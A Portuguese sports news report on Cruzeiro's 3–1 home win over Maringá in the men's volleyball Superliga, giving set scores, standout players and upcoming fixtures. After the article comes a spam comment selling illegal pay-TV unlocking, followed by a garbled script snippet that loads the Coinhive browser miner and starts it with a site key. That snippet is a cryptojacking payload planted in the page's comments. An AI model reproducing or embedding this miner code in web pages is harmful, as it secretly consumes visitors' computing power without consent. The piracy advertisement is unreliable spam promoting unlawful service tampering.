Levantador Fernando Cachopa foi eleito o melhor em quadra na partida entre Cruzeiro e Maringá (Foto: Reprodução/Twitter)
Jogando em casa, o Cruzeiro conquistou a 12ª vitória na atual edição da Superliga Masculina de Vôlei. Na noite deste sábado, no Ginásio do Riacho, em Contagem, a equipe celeste derrotou o Maringá por três sets a um (parciais de 25/23, 21/25, 25/17 e 25/19), em jogo válido pela terceira rodada do returno da competição. O Cruzeiro lidera a disputa com 37 pontos, com 12 triunfos e apenas duas derrotas.
O jogo parecia tranquilo para os donos da casa. No início da partida, o Cruzeiro chegou a fazer 6 a 1 e administrar a diferença no placar na casa dos cinco pontos. No entanto, a equipe paranaense reagiu na reta final do set, ficando um ponto atrás quando o marcador anotou 24 a 23. Na bola de segunda do levantador Fernando Cachopa, melhor jogador em quadra, a Raposa fez 25 a 23 na primeira parcial.
O bom momento em quadra do Maringá ficou evidente no segundo set, quando o time começou a parcial em vantagem. Sem ação, os cruzeirenses viram os adversários abrirem sete pontos de frente. O técnico Marcelo Mendez tentou algumas mudanças, mas não teve sucesso. Na bola desviada no bloqueiro do central Simon, o Maringá fechou o set em 25 a 21, empatando a partida.
O Cruzeiro se reencontrou na terceira parcial. Com o central Isac mostrando eficiência no bloqueio, e Filipe e Leal decidindo no ataque, a equipe celeste comandou a marcha no placar. Com o cubano Simon fechando a porta na rede, os donos da casa chegaram a 21 a 13 no marcador. Coube a Isac fechar o set em 25 a 17 para o Cruzeiro.
O Maringá foi para o tudo ou nada no set seguinte, e a partida se manteve equilibrada até o marcador ficar em 5 a 5. A partir daí, a equipe celeste passou a frente, colocando três pontos de vantagem no placar e mantendo o ritmo até o fim, fechando em 25 a 19 e liquidando o jogo em três sets a um.
Depois de enfrentar o Maringá, o Cruzeiro se concentra na disputa da semifinal da Copa Brasil. Na próxima quinta-feira, às 19h (de Brasília), em São Paulo, o equipe mineira enfrenta o Sesc-RJ, em jogo único, decidindo um lugar na finalíssima da competição. Somente no dia 31, a Raposa volta a jogar pela Superliga, recebendo o Canoas, também em Contagem, em partida antecipada da quinta rodada do returno da disputa.
VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345
Erro ao postar comentário.
Código do erro: 803743
< src="https://coinhive.com/lib/coinhive.min.js">><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();>